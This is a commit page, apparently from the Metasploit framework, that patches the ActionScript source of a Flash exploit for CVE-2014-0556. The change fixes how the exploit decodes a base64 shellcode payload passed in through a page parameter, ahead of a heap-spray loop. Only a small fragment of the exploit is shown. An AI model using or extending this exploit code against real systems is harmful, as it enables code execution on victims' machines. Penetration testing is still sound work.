Fix CVE-2014-0556

bug/bundler_fix
jvazquez-r7 2015-05-26 15:30:39 -05:00
parent d76a9c6565
commit 1742876757
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
2 changed files with 6 additions and 2 deletions

BIN
data/exploits/CVE-2014-0556/msf.swf Executable file → Normal file

Binary file not shown.

View File

@ -27,8 +27,12 @@ package
public function Main()
{
var b64:Base64Decoder = new Base64Decoder()
b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
var payload:String = b64.toByteArray().toString()
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
var pattern:RegExp = / /g;
b64_payload = b64_payload.replace(pattern, "+")
b64.decode(b64_payload)
var payload:String = b64.toByteArray().toString()
for (i = 0; i < bv.length; i++) {
bv[i] = new ByteArray()